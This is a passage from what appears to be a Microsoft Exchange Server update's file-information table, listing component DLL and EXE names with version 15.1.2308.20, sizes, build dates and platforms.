3-Nov-21| 18:41| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.1.2308.20| 172,944| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.1.2308.20| 102,792| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.1.2308.20| 98,704| 3-Nov-21| 20:21| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.1.2308.20| 188,304| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.1.2308.20| 43,400| 3-Nov-21| 20:24| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.1.2308.20| 447,376| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.1.2308.20| 90,000| 3-Nov-21| 20:27| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.1.2308.20| 107,920| 3-Nov-21| 21:49| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.1.2308.20| 371,088| 3-Nov-21| 20:32| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.1.2308.20| 193,928| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2308.20| 551,816| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2308.20| 16,272| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2308.20| 15,752| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2308.20| 321,424| 3-Nov-21| 20:28| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2308.20| 17,800| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2308.20| 45,456| 3-Nov-21| 20:13| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2308.20| 18,320| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2308.20| 12,664| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2308.20| 20,856| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2308.20| 415,112| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2308.20| 1,269,648| 3-Nov-21| 18:57| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2308.20| 41,872| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2308.20| 433,552| 3-Nov-21| 18:41| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2308.20| 4,563,320| 3-Nov-21| 22:38| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2308.20| 261,000| 3-Nov-21| 18:46| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2308.20| 33,680| 3-Nov-21| 18:30| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2308.20| 94,088| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2308.20| 591,224| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2308.20| 3,560,848| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2308.20| 67,960| 3-Nov-21| 21:08| x86 \nMicrosoft.exchange.management.dll| 15.1.2308.20| #########| 3-Nov-21| 20:46| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2308.20| 58,744| 3-Nov-21| 20:53| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2308.20| 23,944| 3-Nov-21| 20:53| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2308.20| 101,776| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2308.20| 543,624| 3-Nov-21| 20:49| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2308.20| 305,016| 3-Nov-21| 20:50| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2308.20| 131,984| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2308.20| 418,696| 3-Nov-21| 20:53| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2308.20| 275,856| 3-Nov-21| 20:54| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2308.20| 70,528| 3-Nov-21| 21:03| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2308.20| 7,874,440| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2308.20| 1,500,536| 3-Nov-21| 20:51| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2308.20| 145,296| 3-Nov-21| 21:07| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2308.20| 13,704| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2308.20| 71,560| 3-Nov-21| 20:53| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2308.20| 1,301,368| 3-Nov-21| 20:50| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2308.20| 1,876,360| 3-Nov-21| 21:00| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2308.20| 5,225,848| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2308.20| 36,216| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2308.20| 117,624| 3-Nov-21| 18:55| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2308.20| 209,808| 3-Nov-21| 20:50| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2308.20| 79,752| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2308.20| 17,296| 3-Nov-21| 18:36| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2308.20| 156,040| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2308.20| 65,928| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2308.20| 30,608| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2308.20| 58,232| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2308.20| 29,576| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2308.20| 175,496| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2308.20| 28,552| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2308.20| 75,136| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2308.20| 207,240| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2308.20| 440,696| 3-Nov-21| 20:17| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2308.20| 83,336| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2308.20| 35,208| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2308.20| 53,128| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2308.20| 96,648| 3-Nov-21| 20:20| x86 \nMicrosoft.exchange.migration.dll| 15.1.2308.20| 1,110,416| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2308.20| 14,736| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.1.2308.20| 135,560| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2308.20| 5,156,744| 3-Nov-21| 21:43| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2308.20| 19,840| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2308.20| 68,496| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.net.dll| 15.1.2308.20| 5,084,560| 3-Nov-21| 18:46| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2308.20| 265,616| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.2308.20| 37,752| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2308.20| 14,200| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.2308.20| 549,768| 3-Nov-21| 21:33| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2308.20| 22,928| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2308.20| 106,384| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.2308.20| 291,728| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2308.20| 17,272| 3-Nov-21| 18:29| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.2308.20| 277,880| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.odata.dll| 15.1.2308.20| 2,992,528| 3-Nov-21| 21:30| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.2308.20| 89,976| 3-Nov-21| 19:35| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2308.20| 101,776| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2308.20| 38,288| 3-Nov-21| 20:00| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2308.20| 45,456| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2308.20| 58,232| 3-Nov-21| 19:58| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2308.20| 147,336| 3-Nov-21| 19:55| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2308.20| 26,512| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2308.20| 184,184| 3-Nov-21| 19:42| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2308.20| 26,512| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2308.20| 38,288| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2308.20| 55,688| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.2308.20| 147,328| 3-Nov-21| 19:41| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2308.20| 191,888| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2308.20| 33,672| 3-Nov-21| 19:57| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.2308.20| 28,048| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2308.20| 32,648| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2308.20| 15,248| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2308.20| 17,288| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2308.20| 17,288| 3-Nov-21| 18:37| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.2308.20| 106,880| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.2308.20| 106,880| 3-Nov-21| 19:56| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.2308.20| 24,952| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2308.20| 24,952| 3-Nov-21| 19:53| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2308.20| 42,872| 3-Nov-21| 18:52| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.2308.20| 264,056| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2308.20| 264,056| 3-Nov-21| 19:52| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.2308.20| 358,288| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.2308.20| 4,168,568| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2308.20| 326,024| 3-Nov-21| 21:05| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2308.20| 41,360| 3-Nov-21| 20:58| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2308.20| 30,608| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2308.20| 135,040| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2308.20| 436,616| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2308.20| 14,208| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.2308.20| 224,120| 3-Nov-21| 20:51| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2308.20| 105,864| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.pst.dll| 15.1.2308.20| 168,824| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.2308.20| 168,824| 3-Nov-21| 18:20| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.2308.20| 259,472| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.2308.20| 72,072| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2308.20| 215,928| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.2308.20| 106,888| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2308.20| 425,848| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2308.20| 70,544| 3-Nov-21| 19:59| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.2308.20| 46,472| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.2308.20| 206,712| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.query.core.dll| 15.1.2308.20| 163,192| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.2308.20| 342,408| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.2308.20| 149,392| 3-Nov-21| 20:32| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.2308.20| 95,112| 3-Nov-21| 20:28| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2308.20| 127,352| 3-Nov-21| 20:15| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.2308.20| 63,376| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.2308.20| 36,744| 3-Nov-21| 19:32| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2308.20| 17,808| 3-Nov-21| 19:15| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.2308.20| 9,666,936| 3-Nov-21| 20:25| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2308.20| #########| 3-Nov-21| 18:52| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2308.20| 36,728| 3-Nov-21| 18:55| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.2308.20| 97,672| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2308.20| 28,560| 3-Nov-21| 18:52| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.2308.20| 72,080| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.2308.20| 15,736| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.2308.20| 59,256| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.rpc.dll| 15.1.2308.20| 1,683,320| 3-Nov-21| 18:52| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2308.20| 209,808| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2308.20| 60,296| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2308.20| 517,512| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2308.20| 161,144| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2308.20| 721,784| 3-Nov-21| 18:53| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2308.20| 243,088| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.2308.20| 20,872| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.2308.20| 35,216| 3-Nov-21| 20:51| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.2308.20| 42,360| 3-Nov-21| 19:58| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.2308.20| 56,184| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.2308.20| 27,528| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.rules.common.dll| 15.1.2308.20| 130,424| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.2308.20| 14,728| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.2308.20| 20,360| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.safehtml.dll| 15.1.2308.20| 21,384| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.1.2308.20| 267,656| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.2308.20| 110,992| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.1.2308.20| 112,528| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.1.2308.20| 622,456| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.2308.20| 162,192| 3-Nov-21| 20:30| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.2308.20| 12,168| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.2308.20| 19,320| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.search.core.dll| 15.1.2308.20| 209,784| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.2308.20| 17,800| 3-Nov-21| 20:32| x86 \nMicrosoft.exchange.search.engine.dll| 15.1.2308.20| 96,656| 3-Nov-21| 20:00| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.2308.20| 16,760| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.search.fast.dll| 15.1.2308.20| 435,064| 3-Nov-21| 19:57| x86 \nMicrosoft.exchange.search.files.dll| 15.1.2308.20| 274,312| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.search.flighting.dll| 15.1.2308.20| 24,976| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.search.mdb.dll| 15.1.2308.20| 219,016| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.search.service.exe| 15.1.2308.20| 26,504| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.2308.20| 162,168| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.security.dll| 15.1.2308.20| 1,555,848| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.2308.20| 19,856| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.1.2308.20| 28,536| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.2308.20| 222,584| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.1.2308.20| 1,110,920| 3-Nov-21| 19:14| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.2308.20| 212,344| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.2308.20| 113,552| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.2308.20| 82,832| 3-Nov-21| 19:16| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.2308.20| 80,776| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.2308.20| 66,424| 3-Nov-21| 19:56| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.1.2308.20| 81,296| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.2308.20| 207,760| 3-Nov-21| 20:00| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.2308.20| 1,163,152| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.2308.20| 504,208| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.2308.20| 47,504| 3-Nov-21| 19:59| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.2308.20| 848,248| 3-Nov-21| 19:55| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.2308.20| 1,219,976| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.2308.20| 30,608| 3-Nov-21| 19:16| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.2308.20| 120,712| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.2308.20| 1,009,528| 3-Nov-21| 19:59| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.2308.20| 110,992| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.2308.20| 34,704| 3-Nov-21| 19:16| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.2308.20| 19,336| 3-Nov-21| 18:30| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.2308.20| 14,712| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.servicehost.exe| 15.1.2308.20| 60,792| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.2308.20| 50,568| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.2308.20| 14,200| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.2308.20| 14,200| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.services.common.dll| 15.1.2308.20| 74,120| 3-Nov-21| 20:21| x86 \nMicrosoft.exchange.services.dll| 15.1.2308.20| 8,477,072| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.1.2308.20| 30,072| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.1.2308.20| 633,720| 3-Nov-21| 21:23| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.2308.20| 1,651,080| 3-Nov-21| 21:15| x86 \nMicrosoft.exchange.services.json.dll| 15.1.2308.20| 296,328| 3-Nov-21| 21:19| x86 \nMicrosoft.exchange.services.messaging.dll| 15.1.2308.20| 43,384| 3-Nov-21| 21:13| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.2308.20| 233,336| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.services.surface.dll| 15.1.2308.20| 178,576| 3-Nov-21| 21:20| x86 \nMicrosoft.exchange.services.wcf.dll| 15.1.2308.20| 348,552| 3-Nov-21| 21:17| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.2308.20| 56,696| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.2308.20| 94,608| 3-Nov-21| 18:41| x86 \nMicrosoft.exchange.setup.common.dll| 15.1.2308.20| 297,360| 3-Nov-21| 21:08| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.1.2308.20| 35,720| 3-Nov-21| 20:53| x86 \nMicrosoft.exchange.setup.console.dll| 15.1.2308.20| 27,016| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.setup.gui.dll| 15.1.2308.20| 115,080| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.setup.parser.dll| 15.1.2308.20| 54,136| 3-Nov-21| 20:50| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.2308.20| 75,152| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.2308.20| 142,736| 3-Nov-21| 19:46| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.1.2308.20| 24,968| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.sharedcache.exe| 15.1.2308.20| 58,768| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.2308.20| 27,000| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.1.2308.20| 46,992| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.sqm.dll| 15.1.2308.20| 46,992| 3-Nov-21| 18:41| x86 \nMicrosoft.exchange.store.service.exe| 15.1.2308.20| 28,048| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.store.worker.exe| 15.1.2308.20| 26,488| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.2308.20| 13,704| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.2308.20| 31,632| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.storeprovider.dll| 15.1.2308.20| 1,166,728| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.structuredquery.dll| 15.1.2308.20| 158,608| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.1.2308.20| 628,104| 3-Nov-21| 20:34| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:39| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.2308.20| 16,272| 3-Nov-21| 20:50| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.1.2308.20| 13,200| 3-Nov-21| 18:30| x64 \nMicrosoft.exchange.textprocessing.dll| 15.1.2308.20| 221,560| 3-Nov-21| 19:01| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.2308.20| 13,688| 3-Nov-21| 18:28| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.2308.20| 29,064| 3-Nov-21| 20:15| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.2308.20| 138,616| 3-Nov-21| 20:13| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.2308.20| 21,904| 3-Nov-21| 19:04| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.2308.20| 40,312| 3-Nov-21| 20:15| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.2308.20| 22,904| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.2308.20| 21,384| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.2308.20| 213,384| 3-Nov-21| 20:21| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.2308.20| 98,688| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.2308.20| 22,920| 3-Nov-21| 20:12| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.2308.20| 169,352| 3-Nov-21| 20:31| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.2308.20| 18,296| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 